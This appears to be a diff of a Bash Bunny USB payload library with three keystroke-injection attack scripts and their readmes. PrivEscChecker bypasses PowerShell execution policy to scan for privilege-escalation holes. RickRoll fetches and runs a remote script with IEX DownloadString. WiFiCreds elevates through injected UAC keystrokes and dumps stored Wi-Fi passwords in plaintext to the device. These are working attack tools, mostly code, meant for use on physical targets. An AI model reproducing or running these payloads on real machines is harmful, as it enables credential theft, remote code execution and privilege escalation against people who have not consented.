Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
########################################################################################################################
# Check for missing Windows update patches either by downloading or use local file (comment local and uncomment webdl) #
########################################################################################################################
# LOCAL FROM BUNNY
Q STRING PowerShell -NoProfile -ExecutionPolicy Bypass -Command \"\& \{Import-Module -Name \$Bunny\\payloads\\${SWITCH_POSITION}\\Sherlock.ps1\; Find-AllVulns \| Out-File \$Bunny\\loot\\PrivEscChecker\\OUTPUT.txt\}\"
# WEBDL FROM INTERNET
# Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nS1L45\'\)\; Find-AllVulns \| Out-File \$Bunny\\loot\\PrivEscChecker\\OUTPUT.txt
Q ENTER
Q DELAY 100
# Create a file called DONE with %ComputerName%-%username%
Q STRING New-Item \$Bunny\\loot\\PrivEscChecker\\DONE -type file -force -value \$env:computername-\$env:username
Q ENTER
Q DELAY 100
# Eject the USB Safely
Q STRING \$Eject \= New-Object -comObject Shell.Application
Q ENTER
Q DELAY 100
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q STRING exit
Q ENTER
sync
#remount the drive and check results
LED R B 200
sleep 1
# Wait for the DONE file to be created so we know powershell is finished
LOOTDIR=/root/udisk/loot/PrivEscChecker
DONEFILE=$LOOTDIR/DONE
while [ ! -e $DONEFILE ]; do sleep .5; done;
sleep 1
# cat %ComputerName%-%username% from DONE as a variable to name folder and then delete
DIR=`cat $DONEFILE`
mkdir $LOOTDIR/$DIR
mv $LOOTDIR/OUTPUT.txt $LOOTDIR/$DIR/OUTPUT.txt
rm -f $DONEFILE
# Check OUTPUT.txt for any missing patches
if grep -lq 'Appears Vulnerable' $LOOTDIR/$DIR/OUTPUT.txt; then
LED G 200
else
LED R
fi

39
payloads/library/PrivEscChecker/readme.md Normal file
View File

@ -0,0 +1,39 @@
# PrivEscChecker
* Author: illwill
* Version: Version 0.1
* Target: Windows
## Description
Checks Windows boxes for unpatched vulns that allow privilege escalation
then stores the result in /root/udisk/loot/PrivEscChecker/%ComputerName%-%username%
Credits to rasta-mouse for their powershell script:
https://github.com/rasta-mouse/Sherlock Sherlock.ps1
Tested on:
+ Windows 7 SP1 32-bit
+ Windows 7 SP1 64-bit
+ Windows 8 64-bit
+ Windows 10 64-bit
## Configuration
Option to change payload.txt to webDL the powershell script by commenting line 47 & uncommenting line 50
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Blue (blinking) | Running Powershell script |
| Purple (blinking) | Checking Results |
| Green (blinking) | Found Possible Privilege Escalation |
| Red (solid | No Possible Privilege Escalation |
## TO-DO
Add more priv checks
Eventually add https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
to check for unquoted paths,dll hijacking, editable services, and other misconfigurations...
## Discussion
https://forums.hak5.org/index.php?/topic/40642-payload-privescchecker/

124
payloads/library/RickRoll/RR.ps1 Normal file
View File

File diff suppressed because one or more lines are too long

BIN
payloads/library/RickRoll/background.mp3 Normal file
View File

Binary file not shown.

34
payloads/library/RickRoll/payload.txt Normal file
View File

@ -0,0 +1,34 @@
#!/bin/bash
#
# Title: RickRoll Prank
# Author: illwill
# Version: 0.1
#
#
# Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes
# Blue...............Running Powershell / Waiting for WebServer to start
# White..............WebServer started starting the rickroll
# Green..............RickRoll Started, Safe to pull
LED B 200
ATTACKMODE HID
Q GUI r
Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\""
Q DELAY 300
Q ENTER
ATTACKMODE RNDIS_ETHERNET
source bunny_helpers.sh
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
cd $payload_dir
LED R G B 200
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
pid=$!
while ! nc -z localhost 80; do sleep 0.2; done
sleep 3
LED G 200
kill -9 $pid
exit

24
payloads/library/RickRoll/readme.md Normal file
View File

@ -0,0 +1,24 @@
# RickRoll Prank
* Author: illwill
* Version: Version 0.1
* Target: Windows
## Description
Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Blue (blinking) | Running Powershell / Waiting for WebServer |
| White (blinking) | WebServer started starting the rickroll |
| Green | RickRoll Started, Safe to pull |
## Discussion
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40579-payload-rickroll-prank/ "Hak5 Forum Thread")

62
payloads/library/WiFiCreds/payload.txt Normal file
View File

@ -0,0 +1,62 @@
#!/bin/bash
#
# Title: WiFiCreds
# Author: illwill
# Version: 0.3
#
# Dumps the stored plaintext Wifi SSID & passwords from Windows boxes using Powershell
# then stashes them in /root/udisk/loot/WiFiCreds
#
# Blue...............Running Powershell HID Script
# Purple.............Getting WiFi Creds
# Green..............Got WiFi Creds
# Red................Didn't Get WiFi Creds
LED R 200
mkdir -p /root/udisk/loot/WiFiCreds
rm -f /root/udisk/loot/WiFiCreds/DONE
ATTACKMODE HID STORAGE
LED B 200
Q GUI
Q DELAY 500
Q STRING POWERSHELL
Q DELAY 1000
Q CTRL-SHIFT ENTER
Q DELAY 2000
Q LEFTARROW
Q DELAY 100
Q ENTER
Q DELAY 1200
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
LED R B 200
Q STRING \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \|
Q STRING \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Content\\W+\\:(.+)\$\"" \|
Q STRING \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\;PASSWORD\=\$pass \}\} \|
Q STRING Format-Table -AutoSize \| Out-File \$Bunny\\loot\\WiFiCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING Out-File -FilePath \$BUNNY\\loot\\WifiCreds\\DONE
Q ENTER
Q DELAY 100
# Eject the USB Safely
Q STRING \$Eject \= New-Object -comObject Shell.Application
Q ENTER
Q DELAY 100
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 100
# GTFO
Q STRING EXIT
Q ENTER
#Sync Drive
sync
FILE="/root/udisk/loot/WiFiCreds/DONE"
while [ ! -e $FILE ]; do sleep 1; done;
sleep 1;
if [ -e $FILE ]; then rm -f $FILE; LED G 200; else LED R; fi

27
payloads/library/WiFiCreds/readme.md Normal file
View File

@ -0,0 +1,27 @@
# WiFiCreds
* Author: illwill
* Version: Version 0.3
* Target: Windows
## Description
Dumps the stored plaintext Wifi SSID & passwords from Windows boxes using
Powershell HID attack, then stashes them in /root/udisk/loot/WiFiCreds/
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| White (blinking) | Setting up |
| Blue (blinking) | Attack running |
| Purple (blinking) | Dumping WiFi Credentials |
| Green (blinking) | Succeeded Dumping WiFi Credentials |
| Red (blinking) | Failed Dumping WiFi Credentials |
## Discussion
https://forums.hak5.org/index.php?/topic/40413-payload-wificreds/